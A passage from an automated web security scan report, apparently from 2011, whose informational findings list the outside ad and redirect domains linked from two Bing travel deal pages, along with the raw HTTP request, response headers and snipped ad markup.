...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,80.1')">Help</a>
...[SNIP]...

22.396. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon

The response contains the following links to other domains:

http://0.r.redacted/?ld=4vFjKmNS7IzlY7Jl8DVqgzUaP2wJMM0igm0G1jkWOzrihmOk8LWUtp6YAR9HJ1lsWHPOvu7-L7flReVj7xCFOC2qy52yADDBFmV3ITrCb7EkwHSpek7tkr6caOMq77MF4Q1CQU5P5v0h3hDAx4LQ83Wxg0h9YVWh6CNC9T--lF7Ny5omafLpeNKxF3x2A6wQatRmvnf3xzgQrTPXzsUyTXrsZXmOIs-2jEvmCMQ7mlf54cyGfgGQFRsNn9pB3YUS7LzOMoa1Wk7IR1oMQB1irJXi65Y2DqjwYGUAbY-An8XRQ21585b-uVKmEEwFN6GOrjLbmDY_X-r6hwx1ZXlMwtsTVUCUzzhz9jC6kxgeIexCTZZFplECZjcz2k2DPZm9wLWqSzLIaVXyt4NWv4Z_qjyEOl3BBEyilbww
http://0.r.redacted/?ld=4vNt5NDdlNanzzW7WC8GKopl4lZI71NLRlXpVqvv1ATrtwAZ3swsOGB-XarITmdmZki5e5V56Kwz3ys5sqMFEwwMb6xHuNhFcPMJss9Tfhd42QOc6oMMLl1U8O49aIjk_ONJQkrX7CQ_hTZNI7S6fI6l1e-FwRweG27esSK0JI00_21IDiFbp3UZIn4w1gcEy88L6z47CJ9exEuQR5KD6ddeT5xSB5oEPFyytDJcZ5PsPTJhYNHGyXuGvcft33sMrLgQ1tV_MvCnwc-jTzaNQ_0DaS8aDbY3D21iDPCRzy-q81VAlMFrPk7yB3jlnuVcO-B1dx9RAmY3M9tZCGffKvZDAjZj293fBK_f-EUefiuPpZ4k8ErPgJIzg
http://0.r.redacted/?ld=4vVgONHsRJ_6HlkaPUUiiGjrFrvmWzzRnxujclBJmZiF7CLsEiOVeEDr1MZdYnWHZwPNBH3EEasg2N7Be9B50LvYGI2Bi8KGmDdqQ1ctQK7vL0UJyx7xiSuWResWx57rMDrCGRaz9x3rbFA9QuQxsByCAhE3S8NDWwe1X5eRxH4Wv2qcA3mcYv4wfySlGwSV2zqnVgUPwIRteqEvLqHS2AzghTp6t82Enl-vuhlUONVz6tpjfl0dY1VaSrMqXhfYLJVbBlhIQo8RiCkbyOMSEduwHR1o7Pcs0m5wX7AJ27sBQ1VAlMT5iPX0bU9UY6vJZ_7XRVeBAmY3M9PdUPFIeVgiY-1lbEhuQYjRnKbGdvUrCT-JTrp3-DEZc
http://0.r.redacted/?ld=4vWi6BTOKZbCRlxwT2Ot6Lby_XI8sDu41bhR9URo4VAXKRYObI1_jriI7doOEaliHDqPm_OXYkGDJVC03Y97PttzbgVMbjTT6Smk9--AyEsAE7b7DVYWC4CooaAoVmZo-Pg2FJC9l3PV9ejmiIkrNUzsemHX_iPtHwcRHAHVLBg6Z2xRv9wmKLavz2I0XYrTkAI9xPvpx6e5fSqdZaV4k-Zkwog4FjZGl3gpbY0jQIP_Yy_jRqX4aGW5iqHpQK6gsmJoIb3zneDTiCwJiphJ7mXbBu6oLTFUT9V39vkHHfn8Zz8Vd2Mt2g57lYMDq9YCXhM_ERAWi2Wd4uWccUDh_V5jVUCUyUIZymYtJ2Byf_EQ1lm8gFECZjcz1hNYDwu-LIfdFRWpyr7iragIFIapxspVByHmX0CF2Oiw
http://0.r.redacted/?ld=4vayN6guVV7x_ikLZ7JrH9P00vHEcA9GdznqtuAyZrOvVlvWNIYbagJHCy7C3OeJm2a2LL80nFg1vnOB6kEGiGwWiUVHTJV5dSB2hnqvOwFhfvRmLPdMl2eryln6sETAJSry7_UWv5uyJdaMSnjciSHi_W1htmpy5u04FfD3k4hHokUxuN_ahWWx0mR7Q9zmPjT05QQ9-fH0RnySUcj4r2jN7gPwMai5sCIiapdit8oWDUlilbyc8axvdpFKsTmCGEhCyM8BDZzdiSAWj9durYktGNEc2nYRuIpnxMXnik7BXiaWRGMvNo4XrjN9Y3mtaAbgVNdWby2NZgpjwZpuWOBjVUCUz_2yQr9CbPnyOrP_ZeoslSECZjcz2TUKrAT3dARpECT5hp4ZNUPhwSGuFoN47kIpRFraAM1A
http://13391.r.redacted/?ld=4vVnfnJsdNqRxk3oH9-DizYk06KaG4nxiFoHWIIOX6_fyeEmNQ1tIXS0M5OEdEN-f1WSUczyg9YXE0Mutnqrq7ow-hQb_i2KYIoklZq0U0xUokfAxx7gk5YACwC5_gAb1YizX4gT9PvM5GiiBIpndAXNwQ-JxIWycDKq_HJJqYTK9bMqO2OOJlO0M-7-BDa36eRiiUZ3cy7-AZOq4acUHengG5AD4NL8ncYfV49TLc6apuhJGPnHj81FqLeo1sz9aTo3bf6xjgXUGNXAL352-2S1rdnAD-4quFBdhBv7P2pxmx77d7E_KGh5rkHqufQmbeNVQJTCrQunbH_mWIYQFfawyzk6EQJmNzPdhYMyShf_FhFV7g0CYSJ249gN9b4cvcQddVF6-6ctTF
http://154875.r.redacted/?ld=4v8koBpq6C1f2J3rq1G2dZOd2Lgc15TXuaqDr6nyKZBTG-Yh-PHxh4Gf38qXijmExbLoWQmb3fDhreE68VWfBzqZXwn5OI0z1Wl46_XB_kXs7gmsaCFLAAWUgnZWDwWxpD8ns4EMR54McN_d-CqyXD9bJ86_pEabia5Wrod4m3G6pxYYKMLDtIuROc9OxvpqE12qqPBpvHNhywSIw3i0AISuDsHs5oF786KWnfKMA5pMFM2IJH_OahbUBlKO_lhGwJTI0nFHtecvR5UEtpt7dLp3NgMr0qQyVmHyijP43S1ow1VAlMOwfYosOnUPcT5ZwQhX6DnRAmY3M9eRNI4be9c-NugVS8VPsuTIUXov20OKBnxKw3NLcfOOs
http://201283.r.redacted/?ld=4v19JZ8GkMI1Qix8-c4GsEIfauKUf4YEW9Y1pmQ__sQghM5Ys7eEkSxcpGogPzw2G7A8EuunyPPGnAHD-0izTFAJwffS0SdT6mlLU34UeVIrUpUnHXSoYG5S_G30zFR9RSYVmvV_l_X05KvtHrGD7vI8NVvoUyvyXreMslK7t2Ijdt12AfetYtHxDO6HCswrdAipqZXmUr7AI_eUHSIn5CpGOA5dgZPSLhN7mXdys-tWDE-CU0ji139orlmBXAyS5A8qBLmuqHXwsQeHF_kQPVizVUCUxnvRyWaddd3tGcQVGWSRI0ECZjcz3WG9taSEeT9nHj64RTMfX47EGwPpp3lBhZ-AWxor6K-A
http://632763.r.redacted/?ld=4vJUn8Al9Itc06aDoVYhnUthVIruSr5Z7w7yuQSX76i2WUHGaNHSARPGFQJ0HNPptKjDUc36_TzoXvEX7QDhGprePSqYTAQGWtd1h7n-1AwPM7xOWHXGSTUNJ0Vvz9Fbb_tFRsThTKQ-kCCaD1W7Am0tpHSgjCNBkviiOSdLiknmCO2vjYoOczOA-yuJMtxa1FPMPOY2U36Qqrko6Z3mG46ErYTAmLaFANpUxEzZATV0g1VAlMvauC3ZieJtkREDMCl9pLrBAmY3M9IwgTR0l6WHo3BRpbBdvDBSUQioRjQEmHzsSZlWGTWxQ
http://910157.r.redacted/?ld=4vLfGGaKW_DlWVmv3D-FcpP6TAX_tmHolGxE9gTOYT1vBx7Q0P46plZ7uaXtE8zrB9Yj7TrN2s4GK_NRObruG8TdCGPud6ZTPVgnBhDsuWK9UwcdcDKV4UEYyAn53sPZd0FO0rDO5LLFRsLSkznRUWCcvT-Vj13uqt2SzCgOnL-J4j5J5pDJ1C9_rksea2L280aLTr8GIKuyYPyhfi-CWiq4zF7rtDyj9gExMEfOiuvaXq1OEd3Wfgpkt29GWLQhpRNVQJTH_dK-_xMGF-SSixVa5E7HgQJmNzPUUIFil788AEJzA7mmxceKOe--KhIHRf3g3v6jrbkreN
http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx
http://www.redacted/

Request

GET /travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 123869
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:46 GMT
Connection: close
Set-Cookie: lbc=913; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-orapn84mqiikyz4heutd5ddqlg8_VID-z6a6mpves4hea5yz7k95g3btp85uu_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:46 GMT; Path=/travel
Set-Cookie: JSESSIONID=72A006E79C9513DF29A0AC98BB71BFE1; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=E1B7A49D1F3C4255A02183C56A71F931; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cd90370b0399e4c5dac7624750cbd05f9; expires=Tue, 29-Jan-2013 17:08:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:46 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,245.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,247.1')">Hotmail</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals1_dealsPage'); return false;" href="http://632763.r.redacted/?ld=4vJUn8Al9Itc06aDoVYhnUthVIruSr5Z7w7yuQSX76i2WUHGaNHSARPGFQJ0HNPptKjDUc36_TzoXvEX7QDhGprePSqYTAQGWtd1h7n-1AwPM7xOWHXGSTUNJ0Vvz9Fbb_tFRsThTKQ-kCCaD1W7Am0tpHSgjCNBkviiOSdLiknmCO2vjYoOczOA-yuJMtxa1FPMPOY2U36Qqrko6Z3mG46ErYTAmLaFANpUxEzZATV0g1VAlMvauC3ZieJtkREDMCl9pLrBAmY3M9IwgTR0l6WHo3BRpbBdvDBSUQioRjQEmHzsSZlWGTWxQ">Cruise Discounts--75% Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals2_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vWi6BTOKZbCRlxwT2Ot6Lby_XI8sDu41bhR9URo4VAXKRYObI1_jriI7doOEaliHDqPm_OXYkGDJVC03Y97PttzbgVMbjTT6Smk9--AyEsAE7b7DVYWC4CooaAoVmZo-Pg2FJC9l3PV9ejmiIkrNUzsemHX_iPtHwcRHAHVLBg6Z2xRv9wmKLavz2I0XYrTkAI9xPvpx6e5fSqdZaV4k-Zkwog4FjZGl3gpbY0jQIP_Yy_jRqX4aGW5iqHpQK6gsmJoIb3zneDTiCwJiphJ7mXbBu6oLTFUT9V39vkHHfn8Zz8Vd2Mt2g57lYMDq9YCXhM_ERAWi2Wd4uWccUDh_V5jVUCUyUIZymYtJ2Byf_EQ1lm8gFECZjcz1hNYDwu-LIfdFRWpyr7iragIFIapxspVByHmX0CF2Oiw">Super Cheap Cruise Deals</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals3_dealsPage'); return false;" href="http://910157.r.redacted/?ld=4vLfGGaKW_DlWVmv3D-FcpP6TAX_tmHolGxE9gTOYT1vBx7Q0P46plZ7uaXtE8zrB9Yj7TrN2s4GK_NRObruG8TdCGPud6ZTPVgnBhDsuWK9UwcdcDKV4UEYyAn53sPZd0FO0rDO5LLFRsLSkznRUWCcvT-Vj13uqt2SzCgOnL-J4j5J5pDJ1C9_rksea2L280aLTr8GIKuyYPyhfi-CWiq4zF7rtDyj9gExMEfOiuvaXq1OEd3Wfgpkt29GWLQhpRNVQJTH_dK-_xMGF-SSixVa5E7HgQJmNzPUUIFil788AEJzA7mmxceKOe--KhIHRf3g3v6jrbkreN">STA Travel® Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights1_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vNt5NDdlNanzzW7WC8GKopl4lZI71NLRlXpVqvv1ATrtwAZ3swsOGB-XarITmdmZki5e5V56Kwz3ys5sqMFEwwMb6xHuNhFcPMJss9Tfhd42QOc6oMMLl1U8O49aIjk_ONJQkrX7CQ_hTZNI7S6fI6l1e-FwRweG27esSK0JI00_21IDiFbp3UZIn4w1gcEy88L6z47CJ9exEuQR5KD6ddeT5xSB5oEPFyytDJcZ5PsPTJhYNHGyXuGvcft33sMrLgQ1tV_MvCnwc-jTzaNQ_0DaS8aDbY3D21iDPCRzy-q81VAlMFrPk7yB3jlnuVcO-B1dx9RAmY3M9tZCGffKvZDAjZj293fBK_f-EUefiuPpZ4k8ErPgJIzg">AA.com - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights2_dealsPage'); return false;" href="http://13391.r.redacted/?ld=4vVnfnJsdNqRxk3oH9-DizYk06KaG4nxiFoHWIIOX6_fyeEmNQ1tIXS0M5OEdEN-f1WSUczyg9YXE0Mutnqrq7ow-hQb_i2KYIoklZq0U0xUokfAxx7gk5YACwC5_gAb1YizX4gT9PvM5GiiBIpndAXNwQ-JxIWycDKq_HJJqYTK9bMqO2OOJlO0M-7-BDa36eRiiUZ3cy7-AZOq4acUHengG5AD4NL8ncYfV49TLc6apuhJGPnHj81FqLeo1sz9aTo3bf6xjgXUGNXAL352-2S1rdnAD-4quFBdhBv7P2pxmx77d7E_KGh5rkHqufQmbeNVQJTCrQunbH_mWIYQFfawyzk6EQJmNzPdhYMyShf_FhFV7g0CYSJ249gN9b4cvcQddVF6-6ctTF">Cheap Flights at $29*</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights3_dealsPage'); return false;" href="http://201283.r.redacted/?ld=4v19JZ8GkMI1Qix8-c4GsEIfauKUf4YEW9Y1pmQ__sQghM5Ys7eEkSxcpGogPzw2G7A8EuunyPPGnAHD-0izTFAJwffS0SdT6mlLU34UeVIrUpUnHXSoYG5S_G30zFR9RSYVmvV_l_X05KvtHrGD7vI8NVvoUyvyXreMslK7t2Ijdt12AfetYtHxDO6HCswrdAipqZXmUr7AI_eUHSIn5CpGOA5dgZPSLhN7mXdys-tWDE-CU0ji139orlmBXAyS5A8qBLmuqHXwsQeHF_kQPVizVUCUxnvRyWaddd3tGcQVGWSRI0ECZjcz3WG9taSEeT9nHj64RTMfX47EGwPpp3lBhZ-AWxor6K-A">Cheap Flights - 60% Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights4_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vVgONHsRJ_6HlkaPUUiiGjrFrvmWzzRnxujclBJmZiF7CLsEiOVeEDr1MZdYnWHZwPNBH3EEasg2N7Be9B50LvYGI2Bi8KGmDdqQ1ctQK7vL0UJyx7xiSuWResWx57rMDrCGRaz9x3rbFA9QuQxsByCAhE3S8NDWwe1X5eRxH4Wv2qcA3mcYv4wfySlGwSV2zqnVgUPwIRteqEvLqHS2AzghTp6t82Enl-vuhlUONVz6tpjfl0dY1VaSrMqXhfYLJVbBlhIQo8RiCkbyOMSEduwHR1o7Pcs0m5wX7AJ27sBQ1VAlMT5iPX0bU9UY6vJZ_7XRVeBAmY3M9PdUPFIeVgiY-1lbEhuQYjRnKbGdvUrCT-JTrp3-DEZc">Southwest - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights5_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vayN6guVV7x_ikLZ7JrH9P00vHEcA9GdznqtuAyZrOvVlvWNIYbagJHCy7C3OeJm2a2LL80nFg1vnOB6kEGiGwWiUVHTJV5dSB2hnqvOwFhfvRmLPdMl2eryln6sETAJSry7_UWv5uyJdaMSnjciSHi_W1htmpy5u04FfD3k4hHokUxuN_ahWWx0mR7Q9zmPjT05QQ9-fH0RnySUcj4r2jN7gPwMai5sCIiapdit8oWDUlilbyc8axvdpFKsTmCGEhCyM8BDZzdiSAWj9durYktGNEc2nYRuIpnxMXnik7BXiaWRGMvNo4XrjN9Y3mtaAbgVNdWby2NZgpjwZpuWOBjVUCUz_2yQr9CbPnyOrP_ZeoslSECZjcz2TUKrAT3dARpECT5hp4ZNUPhwSGuFoN47kIpRFraAM1A">Cheap Flight Deals</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights6_dealsPage'); return false;" href="http://154875.r.redacted/?ld=4v8koBpq6C1f2J3rq1G2dZOd2Lgc15TXuaqDr6nyKZBTG-Yh-PHxh4Gf38qXijmExbLoWQmb3fDhreE68VWfBzqZXwn5OI0z1Wl46_XB_kXs7gmsaCFLAAWUgnZWDwWxpD8ns4EMR54McN_d-CqyXD9bJ86_pEabia5Wrod4m3G6pxYYKMLDtIuROc9OxvpqE12qqPBpvHNhywSIw3i0AISuDsHs5oF786KWnfKMA5pMFM2IJH_OahbUBlKO_lhGwJTI0nFHtecvR5UEtpt7dLp3NgMr0qQyVmHyijP43S1ow1VAlMOwfYosOnUPcT5ZwQhX6DnRAmY3M9eRNI4be9c-NugVS8VPsuTIUXov20OKBnxKw3NLcfOOs">Cheap Flights From $39*</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights7_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vFjKmNS7IzlY7Jl8DVqgzUaP2wJMM0igm0G1jkWOzrihmOk8LWUtp6YAR9HJ1lsWHPOvu7-L7flReVj7xCFOC2qy52yADDBFmV3ITrCb7EkwHSpek7tkr6caOMq77MF4Q1CQU5P5v0h3hDAx4LQ83Wxg0h9YVWh6CNC9T--lF7Ny5omafLpeNKxF3x2A6wQatRmvnf3xzgQrTPXzsUyTXrsZXmOIs-2jEvmCMQ7mlf54cyGfgGQFRsNn9pB3YUS7LzOMoa1Wk7IR1oMQB1irJXi65Y2DqjwYGUAbY-An8XRQ21585b-uVKmEEwFN6GOrjLbmDY_X-r6hwx1ZXlMwtsTVUCUzzhz9jC6kxgeIexCTZZFplECZjcz2k2DPZm9wLWqSzLIaVXyt4NWv4Z_qjyEOl3BBEyilbww">cheap flights</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,258.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,260.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,262.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,264.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,266.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,268.1')">Help</a>
...[SNIP]...

22.397. http://www.bing.com/travel/deals/last-minute-flight-deals.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/deals/last-minute-flight-deals.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon

The response contains the following links to other domains:

http://0.r.redacted/?ld=4v2XsHUQ0-SrGsNki-pVTkRQQMiqz2vGe6LxZI3Nl_zZpRiP3FTq7ilAztSO8eCxnVj9xywUdAqe7y9lok0zj6F2jtkEHvrW9o_N-VNWTRD-BhsClsFMFicbjdyagj3UztI6hGbwTRRAPZkI7WV02eIArFgIairMlazdeoyYV5pskl9EzexDnWsM0f0Vvp2GjpRuhOFK8sA-KBlB-0vanvTNKicdDYpdoeyefdX15BMomhX4oX3-iBl2zFxcGcEYgccKoHgkdtFV7JkJiZHIRODkH5KAqBL73usSmGiSI21yq9cq663W9rrfC7wS6gBeLDEXmdSlnp1AZyNMYOnCVSdJ09AqnlYh9pDHRLK1lDmas1VAlMfkDTbyiKcU8o8uTIwtIstxAmY3M9Hhq3VZ7HtGSsWjK8JvGDry-xLKt8Z1N1JTObJTR8m8k
http://0.r.redacted/?ld=4vHzm6vAY1K1SQoya6w6E2tYNw_GMcUSGEFugSjFhGFQhAxFIB9uehaz98ZVnPM6_yKIaEyLcYMYQPxkwWDz_ypsqRI19jD_DOzH7IShmBiHgpHcDUi1kVJq9Hq4ihrzu7FMORNXWJO9Jim-2UWFmf4sb8LB6DMJtzRKWr5iPYZXk-u34DqdHYIiwqGn5Cv9Tjhzp2mEbil-qHbGCedSloUblbuKyalsUWww63FUr9XQ7IFnYQ65oo6bDVQdk-J2pG8VnxPoUVB8ELLLLoG9_ulP1kCOYoCxP8BT66U7fdqok1VAlMwzwW1vMXot0bh3TrkVgB2xAmY3M9ajl0ztxzKHDH_GjBX2fBENiWDPpwlSxwfjOIAxzdTI8
http://0.r.redacted/?ld=4vMMRVNeXw7SzNIQp8I8MSZzP10ltrxPPv672eFH0FbUVD3zRxYKNSKgHwKMCseQx0nmdzJGvQuC5H3Wf9amPrmwBOl-LS7we315ckpqTT7IrTa45qxQHMpBYf8OoxsbmYQI6wu5Od2VYSrZ_T-oSSAxHkzzR7IWM8xaMOwhzkjSJs6C5HQOVvlNO1JWBc5rGgAZ5lmmYp4BdKLSoQgZcqOBCQo05NEXR4_MOT1kGNgqATHf7FL68zfrA00BrQXBLoS2MVAhC9BC9BgR-COp5kPMqAOZrJvOO4IVdXOYrLLwg1VAlMzjwSR91se16Ks2NjkmMP8xAmY3M9rxxc7L7WI708owxlIKnAAy0mOR8n2dVuT1ItnNTrBfw
http://0.r.redacted/?ld=4vRc2VCxiS2CsWFY5fYFnzfMR9bLqLsUQenYLb8gfCqPVuKuBGftKMHmeSIkHgtAGa0ucWzxZ12SQgxm-J07fiHvUvzDTR-2qIdbihDISPjj1AyOxzZTHqsl6ovPqvPHlLIi319EwbDgwrP5OfweJN5FY_TTzSlTuoD0NQG6Oea4b6CVKyqBb0BO_mgRn_uSK0p-GI4l1ITGHU6xhCoSC3X4tLY-GO3mrWIAZlyQyR7pT5cQcICwXoqLOyf_QqXyJLnHyWUV33L8N4g0Zh01ckkd5GIit5LbnqMA9pwwXVQ7jzSJJ1O_OZQr9FSuBvoNR1IMcrhdI8aBzEQHsDKmkM0zVUCUwq9PQZK4e7vdCDUR3BciWuECZjcz04TOPQYUlJ-AbOP8OXXtEE8vdVnhppS6oEKcUCFX1czA
http://0.r.redacted/?ld=4vUbS6RAnqnusOGkgnp1vo3Z8k4aM1TwgeeYcasb4a2eUb38nyJIyCVmqFMQaWXTvgYqUiBlYq6rP-OZI2phTtQV5UbHbCqRAytcK9aM2M4zDYlK3lsoHp8fQeplBL4a0Pf4bD4QmltFC2e59btsF7ITG6p5LzmvvImvW8vtP_5GyxKjtrLxLMXtIcjICwf1wDPuMwVv7IAQuZsBkz1PMLUFr7DTKX6jQcnJQ2gkIYQJE4NYDHg36x5hK3VSQzVYdctNKwpLk9fh9xeBA-jH0ToYKdAUOX1Fyzje7-ZR_FeuFPOZNdMr5H3d6XhGzEvQFps_FTCjaDiAuHnr2lHKQ7sDVUCUzF0X1i1NyAMPR80c77me7pECZjcz3ZCYmgcFoTdwNhUXKmLrCynNs_NPY3UCNijLhTdTgwWQ
http://0.r.redacted/?ld=4vWA67IO3b_WJhNoawHMtUCeAmpJmtue4lCWkYfGCFf9UuCKBPSOjfJVtJQ-jOj27raVqXnvrOx8xowBVZvicWt1S0BkgYalvv8miQ4Vu3BkGVokUjZPNdSXLySkP_FBTFo5A24sXPACr1MJ7QfM_q_LUc6YPfaRmSKrD0U4KY3HPxJ_X2WxRarNIalN8s7YfNsr3DQr6GCumoVq2-uKNg_uweJbT3liqUDAX72qo3TFaHn-SWL1Dq6cMtaycW-sZ3zCQswH22nG2myc6nzRz3rCq2qDVLv8N5KYs3RTpb1jE9iqwybPdZES11g2Fq7QEy3MVl2bA7ScjOW9DZNZNOOjVUCUz9_e9zpcm5iGunm1dpONUoECZjcz22LbTgLNXeJK0sy99ohQTMQLIqeNOkujBxJnNveYu6TQ
http://13391.r.redacted/?ld=4vFYm3A_Rct80ovuFF1tnJzzjiKB0UlFcDeK5TvLUgyM9CzQrln1sJXcrCYaLfi_9Tse0NYLb3LWN01gnUZEB0sRZzrDWi41IjkK8B1YI7sy9hQE3iNL1Mgzu3J2s2HKCh814SSmve_LNm55kC-qDG3ZZRCtCFgLlr_DxqDQ8t4Nof0TOXtQmArBi_3Is9TQNUWvAwcio1uxFtd8aDixtsBXgkEQHcWLYVV_uCv46gRFaZNsXechzHsS_9PKNEBJ2hTS3ql0m28tjpv49qFOli4Jhha-qF5l0T6vPNIpaQ5CQ1VAlMGwLueDt9-TDph2CamBDcXhAmY3M9DXnT31BJQ6zT5EzPzAetD_eK-NviJFltvAl4_LHDR4E
http://154875.r.redacted/?ld=4v3hc0Ha9kx9ipjmAjQdmQnRbOXZ5YE6OdgfmbvSIIbQQ__SgeJMDExBMg3CYUK0PglxbfIeSkVOfG1UNVI6_0yFRFuEIiTtlJt0xFuDga0NbqJRhI3L-uo3mDIz-jInw7vdT9KSgDVHVNc6fNPS-BQwtkMR7R4koL3MiEtiKXa8HnwzUBgL4V9gg3Uj28QSCFXJhWMwf2lQpeEpaUbj6Chd8V7qUVftFS7esVT0VmFcnbjbbHS5ZV4YLinT4L4lUJtWIK9wLU_YGVqeXNjya-pjVUCUxWnFkSuSCARH7RwZ7nF47WECZjcz05zNM32RPsfFoqoo__fQCA7pNXm_ws2kEa5cempcG5ew
http://201283.r.redacted/?ld=4vLDL1HgXAN-_5sL37i1jw9DecPkefItJyNWHiqfhn-UtOVpKtxfFnfjp76J9sYSnwuZ0BJWfeXtmGr0f5JIMiqjIczusHQ7dNyKxCJyTgJfIDmXWl_YoH0-UP6vl2ZtT3u6k7WW7JrIWGzp0vMCmytvp5jXIi2emgZ1TXPZtDTNf1oeqGLAr0EDX9RGXz9p4lWEPmA58wIWbJhdwl6yoRmCWSog3RkYTq-7lHVazPy_lPcKiN9p7wc3wwuamCycV_bbPqtGT8LBZK4Nbzx82paoy-Tynirika1GAsbjp8tbphS_VL7wmbmzgf0-oD_-ZTn6myTrOsxxV9BXjC4xpmIjVUCUxGnr3GFFYV8gu2oyWuS8XkECZjcz397Q22g3XS_WEYTo8b835R7Y2-E7pLj_rJ1qzlRA-UUg
